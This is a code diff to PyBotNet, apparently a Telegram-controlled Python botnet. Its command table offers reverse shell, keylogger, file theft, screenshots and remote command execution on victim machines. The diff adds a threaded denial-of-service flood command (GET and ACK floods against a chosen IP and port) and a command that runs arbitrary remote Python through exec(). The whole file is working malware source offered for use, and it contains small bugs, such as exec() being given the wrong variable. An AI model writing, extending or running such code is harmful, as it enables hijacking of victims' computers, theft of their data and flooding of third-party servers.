@@ -1,17 +1,19 @@
 '''Defult PyBotNet scripts'''
-import enum
+
 import re
 import os
 import subprocess
-import requests
 import threading
+import random
+import socket
+import webbrowser
+
 from typing import List
 from time import sleep
 from uuid import getnode as get_system_mac_addres
 from requests import get
-import sys
+
 from playsound import playsound
-import webbrowser
 
 
 # pybotnet import
@@ -25,41 +27,42 @@ memory = ''
 scripts_name = {
     MAC_ADDRES: "`<system MAC_ADDRES> <command>`: run command on one target",
 
-    "help": "`help`: send this message",
+    "help":             "`help`: send this message",
 
-    "do_sleep": "`do_sleep <scconds> <message>`: print message and sleep",
+    "do_sleep":         "`do_sleep <scconds> <message>`: print message and sleep",
 
-    "get_info": "`get_info`: get target info",
+    "get_info":         "`get_info`: get target info",
 
-    "reverse_shell": "`<system MAC_ADDRES> reverse_shell`: start reverse shell on target system",
+    "reverse_shell":    "`<system MAC_ADDRES> reverse_shell`: start reverse shell on target system",
 
-    "export_file": "`export_file <download link>`: target donwload this file and save to script path",
+    "export_file":      "`export_file <download link>`: target donwload this file and save to script path",
 
-    "import_file": "`import_file <file route>`: get a file from target system",
+    "import_file":      "`import_file <file route>`: get a file from target system",
 
-    "screenshot":  "`screenshot`: Takes a screenshot, return the download link",
+    "screenshot":       "`screenshot`: Takes a screenshot, return the download link",
 
-    "info": "`info`: run `get_info` command!",
+    "info":             "`info`: run `get_info` command!",
 
-    "cmd": "`cmd <command>`: run command in target terminal",
+    "cmd":              "`cmd <command>`: run command in target terminal",
 
-    "/start": "`/start`: run `help` command!",
+    "/start":           "`/start`: run `help` command!",
 
-    "keylogger": "`keylogger start/stop`: Starts keylogger. use keylogger stop to stop keylogger",
-
-    "schedule": """`schedule start <second> <shell-command>`: Starts a new schedule for a command.
-    `schedule list`: lists all schedules
-    `schedule stop <schedule name>`: Stops a schedule
-    """,
-    "playsound": "`playsound <soundname>` Plays a sound , MP3 or WAV Files. Sound file should be in the working path.",
-    "openurl": "`openurl <url> <how-many-times>` Will open a specified url n times",
+    "keylogger":        "`keylogger start/stop`: Starts keylogger. use keylogger stop to stop keylogger",
 
+    "schedule":         """`schedule start <second> <shell-command>`: Starts a new schedule for a command.
+                        `schedule list`: lists all schedules
+                        `schedule stop <schedule name>`: Stops a schedule
+                        """,
+    "playsound":        "`playsound <soundname>` Plays a sound , MP3 or WAV Files. Sound file should be in the working path.",
+    "openurl":          "`openurl <url> <how-many-times>` Will open a specified url n times",
+    "dos":              """`dos <attack-type [GETFlood-ACKFlood]> <target-ip> <target-port> <thread-number> <payload-size>` Will run Denial-Of-Service Attack.""",
+    "runcode":          "`runcode <code>` Will run given python code. This function cant return values.",
 }
 
 
 def split_command(command: str) -> list:
     '''split string by space'''
-    return command.split(' ')
+    return command.split('\n') if '\n' in command else command.split(' ')
 
 
 def get_command_name(command: str) -> str:
@@ -74,7 +77,7 @@ def is_command(command) -> bool:
     return False
 
 
-def reverse_shell(is_shell, ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger):
+def reverse_shell(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger):
     ''' start reverse shell on target system and send response in telegram bot '''
 
     def send_message(text: str):
@@ -108,14 +111,14 @@ def reverse_shell(is_shell, ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, l
                 break
             else:
                 out_put = execute_cmd(
-                    command=message_one, is_shell=is_shell, logger=logger)
+                    message_one, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
             send_message(out_put)
             repeat = 0
     logger.info("reverse shell exit.")
     return "reverse shell exit."
 
 
-def execute_scripts(command: str, pybotnet_up_time: int, is_shell: bool, ADMIN_CHAT_ID: str,
+def execute_scripts(command: str, pybotnet_up_time: int, ADMIN_CHAT_ID: str,
                     TELEGRAM_TOKEN: str, previous_update_id: List[int], logger):
     command_name = get_command_name(command)
     try:
@@ -126,7 +129,7 @@ def execute_scripts(command: str, pybotnet_up_time: int, is_shell: bool, ADMIN_C
                 logger.info('delete mac addres and run command ')
                 new_command = ' '.join(split_command(command)[1:])
                 return execute_scripts(
-                    new_command, pybotnet_up_time, is_shell,
+                    new_command, pybotnet_up_time,
                     ADMIN_CHAT_ID, TELEGRAM_TOKEN,
                     previous_update_id, logger)
 
@@ -137,7 +140,7 @@ def execute_scripts(command: str, pybotnet_up_time: int, is_shell: bool, ADMIN_C
                 return get_info(pybotnet_up_time, logger)
 
             elif command_name == 'cmd':
-                return execute_cmd(command, is_shell, logger)
+                return execute_cmd(command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, withThread=True)
 
             elif command_name == 'ls':
                 return execute_ls(command, logger)
@@ -158,7 +161,7 @@ def execute_scripts(command: str, pybotnet_up_time: int, is_shell: bool, ADMIN_C
                 return command_help(logger)
 
             elif command_name in ['reverse_shell']:
-                return reverse_shell(is_shell, ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)
+                return reverse_shell(ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)
 
             elif command_name == "keylogger" and split_command(command)[1] in ['start', 'stop']:
                 return keylogger(logger, command)
@@ -171,6 +174,12 @@ def execute_scripts(command: str, pybotnet_up_time: int, is_shell: bool, ADMIN_C
 
             elif command_name == "openurl":
                 return openurl(logger, command)
+
+            elif command_name == "dos":
+                return dos(logger, command)
+
+            elif command_name == "runcode":
+                return runcode(logger, command)
         logger.error('execute_scripts invalid command; Wrong format')
         return f"execute_scripts invalid command; Wrong format \n\n scripts name:\n {','.join(scripts_name)}"
 
@@ -274,8 +283,8 @@ def clean_shell_data(output):
     return output
 
 
-def cmd(command: list, is_shell: bool, logger):
-    '''run code on terminal'''
+def cmd(command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, withThread):
+    '''Runs cmd commands.'''
 
     if command[0] == 'ls':
         logger.info('redirect to execute_ls')
@@ -287,22 +296,31 @@ def cmd(command: list, is_shell: bool, logger):
 
     logger.info(f'try to run: {command}')
 
-    if not is_shell or command[0] in ['mkdir', 'touch', 'rm', 'rmdir']:
+    if command[0] in ['mkdir', 'touch', 'rm', 'rmdir']:
         os_result = os.system(' '.join(command))
-        add_on_message = ''
-        if not is_shell:
-            add_on_message = '''\n
-you compile app noconsole (is_shell = False)
-That\'s why I can\'t get the output text by `cmd` command'''
+        add_on_message = '''Done !'''
 
         return f'output code "{os_result}", {add_on_message}'
 
     else:
-        result = subprocess.getoutput(' '.join(command))
-        return clean_shell_data(result)
+        # Everything starts from here.
+        if not withThread:
+            executecode = util.execute_commands(
+                ' '.join(command), ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
+            result = executecode.runcommand_for_reverse_shell()
+            return clean_shell_data(result)
+
+        else:
+            executecode = util.execute_commands(
+                ' '.join(command), ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger)
+            command = threading.Thread(target=executecode.runcommand)
+            command.start()
+            return "Your command is being executed , you will get the results when it is done."
 
 
-def execute_cmd(command: str, is_shell: bool, logger) -> str:
+def execute_cmd(command: str, ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str, logger, withThread=False) -> str:
+    # Removed Is Shell
+    # For what is for reverse shell
     try:
         command = split_command(command)
         if command[0] == 'cmd':
@@ -312,7 +330,9 @@ def execute_cmd(command: str, is_shell: bool, logger) -> str:
         return f'execute_cmd invalid command; Wrong format: {error}'
 
     try:
-        return cmd(command, is_shell, logger=logger)
+        return cmd(
+            command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger=logger, withThread=withThread
+        )
 
     except OverflowError as error:
         return f'cmd {error}'
@@ -528,7 +548,6 @@ def playsound_pybotnet(logger, command):
     return "Playsound Started."if threadObject.is_alive() else "PlaySound Failed."
 
 
-
 def openurl(logger, command):
     url = split_command(command)[1]
     times = split_command(command)[2]
@@ -544,6 +563,61 @@ def openurl(logger, command):
         return "Error occurred."
 
 
+def dos(logger, command):
+    splitted_command = split_command(command)
+
+    dostype = splitted_command[1]
+    target = splitted_command[2]
+    port = splitted_command[3]
+    thread_num = splitted_command[4]
+    payload = splitted_command[5]
+    if all(var.isdigit for var in [port, thread_num, payload]):
+        pass
+    else:
+        logger.error("Data was not correct.")
+        return "Data was not correct."
+
+    try:
+        logger.info(f"Checking IP {target} on port {port}")
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((target, int(port)))
+        s.close()
+    except:
+        logger.error(f"IP {target} on port {port} failed.")
+        return f"IP {target} on port {port} failed."
+
+    else:
+        try:
+            payload = random._urandom(
+                int(payload)) if dostype.lower() == "ackflood" else 1
+        except:
+            logger.error("Payload too big. Aborting.")
+            return "Payload too big , try smaller payloads."
+        else:
+            try:
+                logger.info("Starting Dos Attack...")
+                dos = util.dos(
+                    target, int(port), payload, dostype
+                )
+                for i in range(int(thread_num)):
+                    thread = threading.Thread(target=dos.attack)
+                    thread.start()
+            except:
+                logger.error("Something Failed. Maybe The Servers Are Down !")
+                return "Something Failed. Maybe The Servers Are Down !"
+
+
+def runcode(logger, command):
+    code = ' '.join(split_command(command)[1:])
+    logger.info(f"Trying to run {code}")
+    try:
+        exec(command)
+        return "ِDone"
+    except Exception as error:
+        logger.error(f"Something failed while trying to run code. {error}")
+        return f"Something failed while trying to run code. {error}"
+
+
 def command_help(logger):
     commands = ''
     try:
